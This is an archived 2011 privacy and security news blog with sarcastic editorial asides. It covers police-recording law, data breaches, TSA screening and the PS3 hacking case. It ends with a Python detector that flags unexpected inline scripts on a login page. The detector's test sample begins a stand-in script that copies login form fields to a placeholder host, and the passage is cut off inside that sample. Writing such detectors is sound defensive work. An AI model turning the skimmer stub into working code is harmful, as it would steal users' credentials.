Saturday, January 15, 2011

Would this mean the “Rodney King” video was illegal?

Court Rejects Claim of a First Amendment Right to Audio-Record Police Officers

January 14, 2011 by Dissent

Eugene Volokh mentions a ruling in ACLU v. Alvarez (N.D. Jan. 10, 2011) that will probably disappoint many of this blog’s readers. Here’s a snippet of the opinion:

To assist in deterring and detecting police misconduct, the ACLU has developed a program to “audio record police officers, without the consent of the officers, when (a) the officers are performing their public duties, (b) the officers are in public places, (c) the officers are speaking at a volume audible to the unassisted human ear, and (d) the manner of recording is otherwise lawful.”


The ACLU intends to audio record police officers speaking with one another or police officers speaking with civilians. The ACLU’s program only implicates conversations with police officers. The ACLU does not intend to seek the consent of either police officers or civilians interacting with police officers. Police officers and civilians may be willing speakers with one another, but the ACLU does not allege this willingness of the speakers extends to the ACLU, an independent third party audio recording conversations without the consent of the participants. The ACLU has not met its burden of showing standing to assert a First Amendment right or injury….

Amendment would be futile. The ACLU has not alleged a constitutional right or injury under the First Amendment. Rather, the ACLU proposes an unprecedented expansion of the First Amendment….

Read more on The Volokh Conspiracy. Note that this ruling is not about the right of an individual to audio record their interactions with the police, but about the rights of a non-involved third party to record the interactions of others. [So, Rodney King could have recorded himself but no one else could? Bob]

[From the article:

“there is nothing in the Constitution which guarantees the right to record a public event”

We need a new word – I suggest we call this an “e-Coup”

Tweeting Tyrants Out of Tunisia: Global Internet at Its Best

Even yesterday, it would have been too much to say that bloggers, tweeters, Facebook users, Anonymous and Wikileaks had “brought down” the Tunisian government, but with today’s news that the country’s president Zine El Abidine Ben Ali has fled the country, it becomes a more plausible claim to make.

… Here’s a guide to the part of this battle fought in cyberspace over the last month.

What other ill-considered technologies will eventually be seen as failures? (My bet? Airport scanners)

Homeland Security Junks Its Sensor-Laden Border Fence

It only took nearly a year of hiatus and $1 billion in sunk costs, but the Department of Homeland Security has finally gotten rid of the networked suite of sensors that made up its virtual border fence. But some of its technology may live on as zombie border protection.

The virtual fence “cannot meet its original objective of providing a single, integrated border-security technology solution,” Secretary Janet Napolitano conceded in a statement today heralding the program’s termination.

Boeing’s SBInet was supposed to be the ultimate in anti-illegal immigrant technology: miles of surveillance-radar towers (colloquially, “Cameras on a Pole”) hooked up to ground-based sensors that detected the heat of someone’s footprints or the metal of a border-crossing vehicle. Sound impractical? That’s what the Government Accountability Office found in October, when it lamented SBInet’s “well-chronicled history of not delivering promised capabilities and benefits on time and within budget.” (.pdf)

Yet the Customs and Border Protection office boasted in a fact sheet that it would ultimately cover 6,000 miles of the U.S.’ northern and southern frontiers. But only 53 miles of border in Arizona ever actually got outfitted with SBInet.

Wow! Detroit schools must have had lots of sex crimes to force them to come up with this!

New security system to protect Detroit students from sex offenders raises privacy concerns

January 14, 2011 by Dissent

First the roll-out of yet another “for the children’s safety” measure, as described by ABC News in Detroit:

The Detroit Public School system is launching a new security system designed to keep sex offenders out of the city’s schools.

The system works by running instant background checks against sex offender registries and then issuing ID badges that identify which area of a school a person is allowed to enter. Anyone who doesn’t pass the background check will not be allowed access to the school. Officials say the system will not check any other criminal databases. [“Ax murderers welcome?” Probably not, see below. Bob]

The system can scan driver licenses and ID cards. It can also run checks using a visitor’s name and date of birth.

The ID badges that are issued by the system include the person’s name and picture. They are temporary and expire after a day. Contractors, regular volunteers and frequent visitors can be issued long-term badges.

Followed quickly by the concerns, as reported by Zenobia Jeffries of the Michigan Citizen:

As of Jan. 3, all visitors — including parents — to DPS will have to scan their driver’s license or state-issued identification to obtain a visitor’s pass with a photo I.D. to enter the school.

Although the system is slated for all schools in the district, it is only up and running currently at a few schools, including Martin Luther King, Jr. Senior High School (King).

Security officers and staff at King refused to comment to this reporter on how the system works or what database visitors’ identification is run through.

“All questions have to go to the district,” said Officer Brewer, campus security of DPS Department of Public Safety.

Speculation is circulating that the information is run through law enforcement, including Homeland Security.

Allegedly, two parents visiting King were arrested the week of Jan. 3, one for outstanding child support and the other for outstanding tickets. These arrests have not been confirmed.

Repeated attempts to get detailed information about the new system, such as the name of the system, supplier, databases into which the information flows and costs, from DPS Emergency Financial Manager (EFM) Robert Bobb and his communications spokesperson Steve Wasko have gone unanswered.

Read more on Michigan Citizen. Both the ACLU of Michigan and the Michigan Citizen have filed FOIA requests to obtain more information.

A press release posted to the Detroit Public Schools web site says:

The system, which is being rolled out gradually to 33 sites, will instantly scan visitors’ driver licenses and state ID cards and cross-check the information with sex-offender registries throughout the United States and Canada. School security personnel can also conduct checks using visitors’ names and date of birth. It will eventually be set up at every DPS school.

Stay tuned… and thanks to the reader who pointed me to this story.

For my Computer Security students. I see this as inevitable, and one of the major security policy issues they will face.

Should Employees Buy Their Own Computers?

"Data security vs. productivity. We have all heard the arguments. Most of us use some of our personal equipment for work, but is it a good idea? 'You are at work. Your computer is five years old, runs Windows XP. Your company phone has a tiny screen and doesn't know what the internet is. Idling at home is a snazzy, super-fast laptop, and your own smartphone is barred from accessing work e-mail. There's a reason for that: IT provisioning is an expensive business. Companies can struggle to keep up with the constant rate of technological change. The devices employees have at home and in their pockets are often far more powerful than those provided for them. So what if you let your staff use their own equipment?' Companies such as Microsoft, Intel, Kraft, Citrix, and global law firm SNR Denton seem to think it's a decent idea."

I am struck by how little data is in this archive. It is probably the size of the average teenager's Facebook dossier.

JFK Library Launches Largest Presidential Online Archive

"The JFK Library launched what it is calling the largest presidential online archive, offering the public 117TB of data related to John F. Kennedy's presidency. The four-year project digitized a plethora of analog material including 200,000 pages of documents; 300 reels of audio tape containing more than 1,245 individual recordings of telephone calls, speeches and meetings; 300 museum artifacts; 72 reels of film; and 1,500 photos. 'As young people increasingly rely on the Internet as their primary source for information, it is our hope that the library's online archive will allow a new generation to learn about this important chapter in American history,' said Carolyn Kennedy, the wife of the late John F. Kennedy, Jr., [Quite a substantial error... Must be some young journalist who thinks history begins with Bill Clinton. Bob] who was on hand at the opening of the archive."

Now this is interesting! WalMart relies on hard negotiation. Amazon seems to think the next step is “Take it or leave it.”

Amazon, Not Developers, Will Set New App Store's Prices

"Looks like Amazon is changing the rules of the game for developers with their new Android App store. I'm curious how Amazon will determine the value of your app and if having control of your prices really matters."

The core of the linked article: "Here's how it works: When developers submit apps to Amazon's app store, they will be able to set a suggested retail price ('MSRP'). It can be free, it can be $50, whatever. Then Amazon -- not the developer -- will set the retail price. It can be full price, it can be a sale price, or it can be free. Developers will get to take home the standard 70% of the app's retail price (what the app sells for) or 20% of the MSRP (what the developer thinks it should sell for), whichever is greater."

I start each day by reading articles collected in my RSS reader. Now I can search more efficiently for new feeds...

5 RSS Feed Search Engines You Should Try Out For Fresh Content

RSS (Rich Site Summary), as we know, is the most common way to publish content that’s regularly updated on the web. Using your feed reader, you can have all the fresh pickings without needing to visit each site individually.

… That’s why you can think of feed search engines as one of the easiest ways to search for the latest feeds en masse. A feed search engine also links to the RSS feed link and a preview of the content if you choose to subscribe without browsing through the site.

Humor: For those who believe texting while driving is not a distraction – a short video. (Narration by the ever-sympathetic mall security team)

Texting Girl Falls In Mall Fountain

Global Warming! Global Warming! Want to bet?

Bastardi's Wager

"AccuWeather meteorologist Joe Bastardi has a challenge for climate scientists. He wants one or more of their rank to accept a bet about temperature trends in the coming decade. Bastardi is making specific predictions. 'The scientific approach is: you see the other argument, you put forward predictions about where things are going to go, and you test them,' he says. 'That is what I have done. I have said the earth will cool .1 to .2 Celsius in the next ten years, according to objective satellite data.' Bastardi's challenge to his critics — who are legion — is to make their own predictions. And then wait. Climate science, he adds, 'is just a big weather forecast.' Bastardi's challenge is reminiscent of the famous Simon-Ehrlich Wager, where the two men made specific predictions about resource scarcity in the '80s."

Friday, January 14, 2011

Interesting. Will more AGs begin to “insist” that credit monitoring be offered?

CT AG looking into UConn breach, demands credit monitoring services

January 13, 2011 by admin

It looks like Connecticut’s new Attorney General, George Jepsen, intends to pursue data breaches like his predecessor. According to Hartford Business Times, Jepsen has sent a letter to UConn requesting additional information on the breach and he “has also insisted UConn provide its customers with identity theft and other credit protections.”

The business of Computer Crime

Your personal data in the wrong hands

January 13, 2011 by admin

Fabio Assolini of Kaspersky writes:

What happens when all of your personal data is readily available for use by a cybercriminal?

Last November we published a blog talking about Brazilian phishing attacks that displayed the victims’ CPF numbers – the Natural Persons Register, the equivalent of a Social Security Number used by the Brazilian government to identify each citizen. A CPF is the most important document a Brazilian citizen possesses. It’s a prerequisite for a series of tasks like opening bank accounts, getting or renewing a driver’s license, buying or selling real estate, receiving loans, applying for jobs (especially public ones), getting a passport or credit cards, etc.

But this incident was just the tip of the iceberg.

Due to our constant monitoring of malicious activities, we found some bad guys offering access to a complete database of all Brazilian citizens that have a CPF – all you need to do is contact a number and the system will bring you the complete personal data of a potential victim.

Read more on SecureList.

[From the article:

We found 3 mirrors of this website offering this kind of ‘service’ to Brazilian bad guys – it’s a service that we call C2C (cybercriminals to cybercriminals).

… Nowadays, we see that the problem of protecting private information is not just confined to users, but applies equally to governments and corporations alike.

(Related) Not sure a password fixes the problem. Why is the data online in the first place?

KY: Information on Green River District Health Department patients exposed on the Web for months

January 13, 2011 by admin

James Mayse reports for the Messenger-Inquirer:

The names, Social Security numbers and dates of birth of thousands of people who visited the Green River District Health Department were available unsecured online for months, at least since October.

But the company maintaining the computer database fixed the problem immediately Wednesday evening after being notified by the Messenger-Inquirer. Numerous follow-ups by M-I reporters and editors found that the database had been secured and now requires a password to access.

The database was created by Fox Technology Group, an Owensboro company that has since been absorbed by Integranetics. The Messenger-Inquirer found 9,986 names and personal information of Daviess County residents on the list after being notified of the problem by a concerned resident who discovered the information while doing a simple Google search.

Almost all of the names included dates of birth, and more than half included Social Security information.

Read more on iStockAnalyst


Computer with Guardsmen’s Personal Info Stolen from Santa Fe Headquarters

January 13, 2011 by admin

New Mexico soldiers deploying to Kosovo now have one more thing to worry about after a computer containing personal information was stolen from the National Guard Headquarters in Santa Fe.

It contained deployment records and social security information for about 650 soldiers throughout the state. The computer was stolen sometime between Dec. 23-28. Soldiers affected have been sent a letter telling them to check with the social security administration, contact their banks and keep an eye on their credit.

A representative from the Guard says both the Army and State Police are investigating.

Source: KRQE

And the data on the computer weren’t encrypted….. why?

And the National Guard isn’t offering them free credit monitoring when they won’t even be around to keep an eye on their credit reports after they deploy…. why?

There doesn’t seem to be any statement on the NM National Guard’s site.

Now they need to define stigma. Is being a “liberal” sufficient?

Second Circuit limits the right to medical privacy

January 13, 2011 by Dissent

We normally associate the constitutional right to privacy with abortion and other child-bearing (and related) concepts. But that right also covers the right to avoid disclosure of certain personal matters, including medical information. This case asks whether a New York City schoolteacher could sue the Board of Education for publicizing her fibromyalgia. The answer is No.

The case is Matson v. Board of Education, decided on January 11. School officials disciplined Matson, a music teacher, for taking sick leave so she could conduct a symphony orchestra at Trinity Church. Her doctor said the stress was work-related. While she needed time off from work, she could still function as a conductor at the church. In disciplining Matson, school officials publicized a report that made reference to her disability, characterized as “chronic fatigue syndrome, known as fibromyalgia.” Matson does not sue over the discipline but, instead, the public report that mentions her disability.

Read more on Bergstein & Ullrich, LLP Second Circuit Civil Rights. It seems that unless you have a fatal or stigmatizing medical condition, you don’t have a right to medical privacy in the Second Circuit.

Airfield of Dreams: If you pay us, we won't grope? What is the strategic statement here? We don't have enough information to know who you are, so we need more or we continue to treat you as a possible terrorist?

TSA: More disclosure by airline travelers could cut intrusive screenings

January 13, 2011 by Dissent

Paul Corson reports:

The head of the Transportation Security Administration says airline travelers could minimize their exposure during the screening process by disclosing more about themselves up-front.

TSA Administrator John Pistole, in a speech Thursday to a lawyers’ group, said the use of detailed identity profiles would be part of a shift toward the greater use of intelligence to try to disrupt potential terrorist activity against commercial flights.

“There are groups of people out there, the very frequent travelers who are willing to provide information,” Pistole said, so that for a fee, “if you don’t want to stand in line, here’s what we can do.”

Pistole said passenger identification would be more stringent than the typical name, date of birth and gender now required to board a jetliner, that he said is “not much to go on.”

He said a trusted traveler program would apply to “those individuals who are willing to disclose more information about themselves in exchange for a different level of screening.”

Pistole did not describe what elements in the screening process a passenger could avoid, saying only it would involve “more identity-based screening than the physical screening.”

Read more on CNN

Sounds like extortion to me: give us all your personal details if you don’t want to be humiliated and have your genitalia touched?

Congress better straighten this out and as a priority item. Look how quickly they introduce bills to protect themselves after the Tucson shooting. Let them introduce bills to protect the innocent public from government assault in the name of sham “security.”

Free(?) webinar on Privacy.

Employee Privacy Gains in the United States

January 14, 2011 by Dissent

Boris Segalis writes:

2010 arguably was a breakout year for consumer privacy in the U.S., but the year also brought about significant changes to the legal landscape of employee privacy. Federal and state court decisions, state legislation and agency actions suggest that the U.S. may be moving towards a greater level of privacy protection for employees. Employers are well-advised to consider these developments in reviewing and revising policies that affect the privacy of their employees.

Read more on InformationLawGroup. Boris reviews several important rulings during 2010 including Quon and Stengart, and also reviews new statutes in Illinois and Oregon that went into effect and that impact employee privacy. The group also notes:

For more information about privacy issues in the workplace, please join us for a webinar on January 27, 2011. The webinar, offered through Park Avenue Presentations, will focus on workplace privacy in the U.S. and Europe. Please email for registration details.

The webinar has been added to the listing of Data Privacy Day 2011 events available elsewhere on this site.

Interesting summary

Who Owns Your Data?

The fundamental problem with data ownership is that bits don’t behave like atoms. For most of human history, our laws have focused on physical assets that couldn’t be duplicated. The old truism “possession is nine-tenths of the law” doesn’t apply in a world where making a million copies, each as good as the original, is nearly effortless.

It’s not just the ability to copy that makes data different, however. How data is used affects its value. If I share a movie with someone, the copyright holder loses a potential sale. On the other hand, they may make money: freely sharing Monty Python videos online increased DVD sales by 23,000%. Some kinds of information were meant to be shared. If I give my phone number to someone, surely it’s gained value. But if it’s written on a bathroom wall, presumably it’s lost some.

Perhaps it was translated poorly from the Japanese? ...or to the Japanese? ...or Japanese law allows this? ...or they have a bunch of bad lawyers?

Today’s Award for the Silliest Theory of the Computer Fraud and Abuse Act

January 14, 2011 by admin

Orin Kerr, a law professor and former attorney in the DOJ who worked in the computer crimes division, has a commentary on a lawsuit involving CFAA claims that’s interesting in terms of defining the scope of what the Computer Fraud and Abuse Act covers – and shouldn’t cover:

Today’s Award for the Silliest Theory of the Computer Fraud and Abuse Act

…goes to the arguments made by Sony’s lawyers in a complaint and motion for a TRO in a recently-filed civil case: Sony Sues PS3 Hackers. The argument: You’re guilty of felony computer hacking crimes if you access your own computer in a way that violates a contractual restriction found in the fine print of the licensing restriction of the product imposed by the manufacturer.

I realize the complaint characterizes the defendants as hackers, and the CFAA is supposed to be about hacking. But think for a moment about the nature of this claim. You bought the computer. You own it. You can sell it. You can light it on fire. You can bring it to the ocean, put it on a life raft, and push it out to sea. But if you dare do anything that violates the fine print of the license that the manufacturer is trying to impose, then you’re guilty of trespassing onto your own property. And it’s not just a civil wrong, it’s a crime.

Read more on The Volokh Conspiracy.

(Related) Another Sony strategic error...

Why Sony Cannot Stop PS3 Pirates

"A former Ubisoft exec believes that Sony will not be able to combat piracy on the PlayStation 3, which was recently hacked. Martin Walfisz, former CEO of Ubisoft subsidiary Ubisoft Massive, was a key player in developing Ubisoft's new DRM technologies. Since playing pirated games doesn't require a modchip, his argument is that Sony won't be able to easily detect hacked consoles. Sony's only possible solution is to revise the PS3 hardware itself, which would be a very costly process. Changing the hardware could possibly work for new console sales, though there would be the problem of backwards compatibility with the already-released games. Furthermore, current users would still be able to run pirated copies on current hardware."

An anonymous reader adds commentary from PS3 hacker Mathieu Hervais about Sony's legal posturing.

Their logic is peccable. (That's the opposite of “impeccable,” right?) “We will limit our unlimited plan...”

Virgin Mobile To Start Throttling Broadband2Go

"Virgin Mobile sent an e-mail today informing me of their plans to start throttling the Broadband2Go Plan. The web site doesn't seem to reflect the change yet, but here is the message they sent to me: 'Here at Virgin Mobile, our mission is to deliver an outstanding customer experience. Sometimes that means making difficult choices in order to provide the best possible service to the greatest number of customers. To make sure we can keep offering our $40 Unlimited Broadband2Go Plan at such a great price, we're putting a speed limit in place for anyone on that plan who uses over 5GB in a month. How will it work? Starting February 15, 2011, if you go over 5GB in a month on the $40 Unlimited Plan: Your data speeds will be limited for the remainder of the monthly plan cycle. During this time, you may experience slower page loads and file downloads and lags in streaming media. Your data speeds will return to normal as soon as you buy a new Broadband2Go Plan. This change will only affect plans bought on or after 2/15/2011. How will it affect me? Keep in mind, 5GB is A LOT of data. To give you an idea, it's about 250 hours of web browsing or over 500,000(!) emails. So this change shouldn't affect you unless you're a heavy downloader/streamer/etc.'"

Just when I was getting comfortable recommending it to people, too. I do prefer a slowdown to an absolute cap, but this sours me a bit on the (locked-to-Sprint) MiFi I bought to use the Virgin service.

For my Ethical Hackers: Hacking in the Cloud

Amazon EC2 Enables Cheap Brute-Force Attacks

"German white-hat hacker Thomas Roth claims he can crack WPA-PSK-protected networks in six minutes using Amazon EC2 compute power — an attack that would cost him $1.68. The key? Amazon's new cluster GPU instances. 'GPUs are (depending on the algorithm and the implementation) some hundred times faster compared to standard quad-core CPUs when it comes to brute forcing SHA-1 and MD,' Roth explained. GPU-assisted servers were previously available only in supercomputers and not to the public at large, according to Roth; that's changed with EC2. Among the questions Roth's research raises is, what role should Amazon and other public-cloud service providers play in preventing customers from using their services to commit crimes?"

Interesting numbers

Are We Too Obsessed With Facebook? [INFOGRAPHIC]

Thursday, January 13, 2011

I'm not sure what they mean by “routine monitoring of backups” – perhaps they were checking to see if everything was being backed up. If so, why wait two months to check?

WA: HACKED: Kadlec notifying patients of computer server breach

January 12, 2011 by admin

From the staff of Tri-City Herald:

Kadlec Regional Medical Center officials announced today that patients are being notified that one of the hospital’s computer servers containing brain scan and other patient studies was hacked in September.

Files housed on the server included information including a patient’s name, birth date, age, gender, medical record number and doctor’s name, but did not include any patient financial information, address, social security number or insurance data.

Kadlec officials first discovered the unauthorized access during routine monitoring of computer network backups on Nov. 11, according to a news release.

Read more on Tri-City Herald. I do not see any notice on the medical center’s site at this time.

[From the article:

Hospital officials said they have added significant security measures to Kadlec's servers to help prevent future breaches. [“We decided to add all that security we had decided we didn't need (didn't want to spend money on) before we found out we had inadequate security...” Bob]

Another confusing statement.

Pentagon Credit Union Database Compromised

"The credit union used by members of the U.S. armed forces and their families has admitted that a laptop infected with malware was used to access a database containing the personal and financial information of customers. The Pentagon Federal Credit Union (PenFed) issued a statement to the New Hampshire Attorney General that said data, including the names, addresses, Social Security Numbers and PenFed banking and credit card account information of its members were accessed by the infected PC." [I doubt the PC acted alone. Was an employee's PC infected with software that captured data? Stole a User ID & Password? Copied the database and emailed it to Romania? Bob]

Again some basic questions. Where should this data be stored? How long should it be stored? (Do 231,000 patients represent months or years of radiology?)

Seacoast Radiology Computer Server Breached – 231,400 Patients Notified

January 12, 2011 by admin

From a Seacoast Radiology press release:

Seacoast Radiology, PA discovered on November 12, 2010 that an office server containing personal patient data and billing information was accessed by an unauthorized third party. Access to this server was disabled immediately and an independent investigation concluded that unauthorized use of patient and billing data is unlikely. [How does one reach this conclusion? Bob] All patients and patient billing guarantors have been notified.

The independent investigation indicated that personal information, including name, address, Social Security number, date of birth, medical procedure codes, diagnosis codes and billing information was stored on this server. Patient radiology reports, including radiographic images, and banking information was not stored on this server and therefore not breached.

Seacoast Radiology has engaged with several computer security experts and has implemented security procedural changes to keep patient data secure from unauthorized access.

In addition to procedural changes, Seacoast Radiology has contracted with ID Experts® to provide an informational toll-free number and website to answer questions about this incident. Patients with questions regarding this incident can visit

This press release is in accordance with the Health Information Technology for Economic and Clinical Health (HITECH) Act. Seacoast Radiology, PA has notified patients, billing guarantors and the Department of Health and Human Services (HHS).

From the FAQ on the support web site:

On November 12, 2010, Seacoast Radiology discovered that there had been unauthorized access to an office server. No credit card information was contained on this server, as Seacoast Radiology does not at this time accept credit cards for payment. The server contained patient names, Social Security numbers, address, phone number and other basic information, as well as basic medical diagnosis codes and basic procedure codes for billing purposes. The server also contained information on individuals serving as ‘insurance guarantors’ for the patients, and some of these individuals did not have social security numbers in the computer. [Sometimes they follow their procedures, sometimes they don't? Bob] In some cases the guarantor information included name and address in addition to Social Security number. Some of the guarantors only had name and address associated with their information, without Social Security number.

Brendon Nafziger of provides additional details:

A large radiology practice in New Hampshire said Wednesday hackers apparently breached a server containing Social Security numbers and medical codes for hundreds of thousands of patients, with the culprits likely rogue gamers looking for bandwidth to play the popular military shoot-’em-up Call of Duty: Black Ops.

The group estimates 231,400 patients might have been affected by the breach.


A management decision: Should we “buy insurance” or accept the risk?

Securing data will be costly, UH says

January 12, 2011 by admin

Gene Park reports:

The University of Hawaii says it needs $1.9 million to tighten its Web security and lessen the chance of future data breaches of individual privacy.

In addition, the 10-campus system would need about $764,000 a year to maintain and operate the upgraded system, said David Lassner, the university’s vice president for information technology.

“Information technology at UH is highly decentralized,” Lassner said yesterday at a state Senate informational hearing at the Capitol, “because as an academic institution, we have lots of people generating information, disseminating it, and over 600 Web servers throughout the UH system.”

The hearing was held in response to three data breaches in the UH system last year. A report by national watchdog group Liberty Coalition said UH was responsible for 54 percent of all data breaches in Hawaii since 2005, compromising 259,000 records.

Read more on the Star Advertiser.

Given that a single breach can reportedly cost $2 million in legal costs alone, it’s a better use of the money to invest in security. That said, there are other costly measures that the Hawaii legislature is considering based on Liberty Coalition’s analysis and recommendations. Having read their report and concluded that it seriously overestimates the number of ID theft victims in Hawaii and that most ID theft cases in Hawaii cannot be clearly attributed to breaches involving either the University of Hawaii or other state agencies, I hope the legislature will go very slowly and not impose costly and undue burdens on businesses and entities that are unlikely to reduce ID theft. But more on that in another blog entry when I find some time.

Article: Is the Fourth Amendment Relevant in a Technological Age?

January 13, 2011 by Dissent

Via, a new article available on SSRN:

Is the Fourth Amendment Relevant in a Technological Age?

Christopher Slobogin, Vanderbilt Law School, January 4, 2011


This work will be a chapter in a forthcoming book in The Future of the Constitution series, edited by Jeffrey Rosen and Benjamin Wittes and published by the Brookings Institute. Over the past 200 years, the Fourth Amendment’s guarantees have been construed largely in the context of what might be called “physical searches” – entry into a house or car; a stop and frisk of a person on the street; or rifling through a person’s private papers. But today, with the introduction of devices that can see through walls and clothes, monitor public thoroughfares twenty-four hours a day, and access millions of records in seconds, police are relying much more heavily on what might be called “virtual searches,” investigative techniques that do not require physical access to premises, people, papers or effects and that can often be carried out covertly from far away. The Supreme Court’s current Fourth Amendment jurisprudence – specifically, its “knowing exposure,” “general public use,” “contraband-specific,” “assumption of risk” and “special needs” doctrines – has both failed to anticipate this development and continued to ignore it. This article describes this jurisprudence and how it can foster law enforcement abuse, mission creep, mistaken seizures and physical searches, and an oppressive atmosphere even for the innocent. It then outlines a more technologically-sensitive Fourth Amendment framework.

You can download the full article from SSRN.

A most interesting report (kind of reads like a marketing brochure) but with lots of quotable quotes...

January 12, 2011

Report: Protecting the Digital Economy

"On January 10, 2011, the EastWest Institute released a report detailing the results of the First Worldwide Cybersecurity Summit: Protecting the Digital Economy, and outlining the cybersecurity initiative’s next steps as it prepares for the Second Worldwide Cybersecurity Summit in London on June 1-2. At the summit, held from May 3 to 5, 2010 in Dallas, Texas, EWI brought together over 400 technical experts, policy elites and national security officials from the Cyber40, an informal grouping of the world’s most digitally-advanced countries—among others, the United States, China, India, Russia and Estonia. Participants worked to identify problems facing crucial sectors of the Internet, such as financial services and essential government services, and forge concrete solutions to protect the world’s digital infrastructure."

Coming soon to your home...

January 12, 2011

New GAO Reports: Electricity Grid Modernization

  • Electricity Grid Modernization: Progress Being Made on Cybersecurity Guidelines, but Key Challenges Remain to be Addressed, GAO-11-117, January 12, 2011: "The electric industry is increasingly incorporating information technology (IT) systems into its operations as part of nationwide efforts—commonly referred to as smart grid—to improve reliability and efficiency. There is concern that if these efforts are not implemented securely, the electric grid could become more vulnerable to attacks and loss of services. To address this concern, the Energy Independence and Security Act of 2007 (EISA) provided the National Institute of Standards and Technology (NIST) and Federal Energy Regulatory Commission (FERC) with responsibilities related to coordinating the development and adoption of smart grid guidelines and standards."

[From the report:

With respect to challenges to securing smart grid systems, GAO identified the following six key challenges:

• Aspects of the regulatory environment may make it difficult to ensure smart grid systems’ cybersecurity.

• Consumers are not adequately informed about the benefits, costs, and risks associated with smart grid systems.

• Utilities are focusing on regulatory compliance instead of comprehensive security.

• There is a lack of security features being built into certain smart grid systems.

• The electric industry does not have an effective mechanism for sharing information on cybersecurity.

• The electricity industry does not have metrics for evaluating cybersecurity.

This makes me ask, “Who is running T-Mobile?”

T-Mobile makes U-turn on data cap cut

T-Mobile UK has backtracked on its decision to drastically cut the mobile data use allowances for existing as well as new smartphone customers, following an explosion of public anger at the move.

Yesterday the operator said it will now only offer the reduced levels of data to new and upgrading customers, while existing customers will get the 1GB to 3GB they signed up for until their contracts run out.

The U-turn, announced yesterday afternoon, came shortly after the UK consumer group Which? said its legal team were of the opinion that T-Mobile was breaking its own terms and conditions by announcing the 'fair use' cap cut less than a month before it will come into force on February 1.

Another “Everyone Knows” for my Statistics students...

Talking On Your Cell Phone Could Make You Drive Safer

The original claim grew from research by psychologists at the University of Utah in 2003, who used driving simulators to test volunteers' reactions while talking and while drunk. The result: "Driving while talking on a cell phone is as bad as or maybe worse than driving drunk," the researchers reported.

That claim has since become part of the accepted canon about road safety, repeated by everyone from Oprah to U.S. Transportation Secretary Ray LaHood in his campaign against distracted driving. Eight states, including California, have made talking on a handheld cell phone while driving illegal.

… And It sounds like common sense: Splitting your mind's attention between the road and whatever someone's blathering into your ear over a cell phone must be dangerous.

… The new study comes from economists Saurabh Bhargava at the University of Chicago and Vikram Pathania of the London School of Economics. They come at the question from a different direction, starting by using data from a cell phone company on up to 440,000 calls made from California drivers during an 11-day period in 2005. The researchers were able to separate drivers from other users by filtering for calls that switched among cell towers.

Their earlier research showed that when cell phone companies had rates that dropped at 9 p.m. on Monday through Thursday nights, calling jumped up. The economists matched their calling data with crash reports for just before and just after 9 p.m, when they could prove calls from drivers on the road increased, and found no significant increase in crashes. When they expanded their scope to additional years and nearby states, there was still no rise in wrecks.

Wednesday, January 12, 2011

For my Computer Security students. This is a Script Kiddie. (It also may be the only time you can get your children to read and follow directions...)

8th grader hacks school server

John Mackle, education director at the Peterborough Victoria Northumberland and Clarington Catholic District School Board, said the pupil at St. Anne's School in Peterborough, Ontario, used a laptop and some downloaded software to access test results from around the province, the Toronto Sun reported Tuesday.

… Mackle said some of the server's security measures had been offline following an upgrade [Technically, that's a downgrade. Bob] before the incident.

Local. For my Ethical Hackers

Springs man sent to prison for hacking into TSA computer

January 11, 2011 by admin

Another case of a disgruntled terminated employee seeking revenge. Douglas James Duchak was sentenced to prison for injecting malicious code into a TSA computer after he was terminated. No personal data compromised, but the potential was there. You can read about the case on The Gazette.

(Related) Your assignment: Video yourself from home to school using unsecured cameras. Extra credit: do it without using Starbucks' cameras...

Peep show: inside the world of unsecured IP security cameras

January 12, 2011 by Dissent

Tom Connor reports:

If you’re in public, you’re on camera. If you walk into a coffee shop, the owner gets you at the register. Visit a larger store, and chances are they have your face as soon as you cross the threshold. At least one or two of your neighbors catch you on camera when you walk around your neighborhood, and many cities monitor traffic using red light cameras at major intersections. The question is no longer if you’re on camera, but rather how many different angles you were caught on while going about your day.

With so much monitoring taking place, and with surveillance systems gaining more online functionality every year, it’s natural that securing these systems would become… complicated. And that many, many are secured incorrectly or not at all. Because so many cameras and surveillance systems are completely open, it’s possible for anyone with Internet access to watch literally thousands of cameras online using only Google and a kindergartener’s understanding of the ‘Net.

Read more on Ars Technica.

“I don't know Marty, what do you want to do?”

Theft of Customers' Personal Property in Cafes and Bars

At present, evaluative research—whether carried out independently or by the police—is scarce; consequently it is not possible to draw any firm conclusions as to which responses to theft of customers’ personal property from cafés and bars are the most effective. Nevertheless, we review several responses to this problem and make tentative statements as to their effectiveness.

Is this a half-vast solution to a vast problem? (Factor this into the 'local monopoly' vs. public Internet utility argument too.)

California to nix cell phones for half its employees

The newly elected governor of California wants to cut state spending and has started by calling for the shut-off of half of the state-issued cell phones, some 48,000 devices, by June 1.

… Of course, the push to cut the number in half by midyear could be slowed if devices are still under contract. In those cases, an early termination fee may be a greater expense to the state than just keeping the device.

We know that Tunisia is a leading user of technology (not!) but I suspect anything they can do, we can do gooder!

Tunisian Gov't Spies On Facebook; Does the US?

"Tunisians logging into Facebook encountered extra JavaScript, probably a sign of their repressive government's attempt to spy on them. The question is: does the US government do the same thing, just more subtly? We're not talking about agents friending you on Facebook to get more information about you; we're talking monitoring your supposedly private information behind the scenes."
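The tell in the Tunisian case was script that the site itself never served. One cheap way to catch that from the client side is to hash every inline script on the page you actually received and compare against the hashes of the scripts the site is known to ship, which is the same idea a Content Security Policy enforces with sha256 hashes in script-src. The example below is added here and is not from the Slashdot post or from Facebook; the login page, the legitimate script, and the stand-in injected script are all constructed for the demonstration.

```python
import hashlib
from html.parser import HTMLParser


class InlineScriptCollector(HTMLParser):
    """Collect the text of every inline <script> (one with no src attribute)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._buf = None  # list while inside an inline <script>, else None

    def handle_starttag(self, tag, attrs):
        if tag == "script" and not any(name == "src" for name, _ in attrs):
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append("".join(self._buf).strip())
            self._buf = None


def script_hash(body):
    """Hex SHA-256 of a script body. CSP script-src hashes use the same digest,
    but base64-encoded rather than hex."""
    return hashlib.sha256(body.encode("utf-8")).hexdigest()


def find_unexpected_scripts(html, allowlist):
    """Return the inline script bodies whose hash is not in the allowlist."""
    collector = InlineScriptCollector()
    collector.feed(html)
    collector.close()
    return [s for s in collector.scripts if script_hash(s) not in allowlist]


# Constructed sample: the one inline script the (hypothetical) site legitimately ships.
LEGIT_SCRIPT = "document.getElementById('email').focus();"

# Constructed stand-in for an injected script that copies the login fields elsewhere.
# The host is a reserved .invalid name; nothing here contacts a real server.
INJECTED_SCRIPT = (
    "var f = document.forms[0]; "
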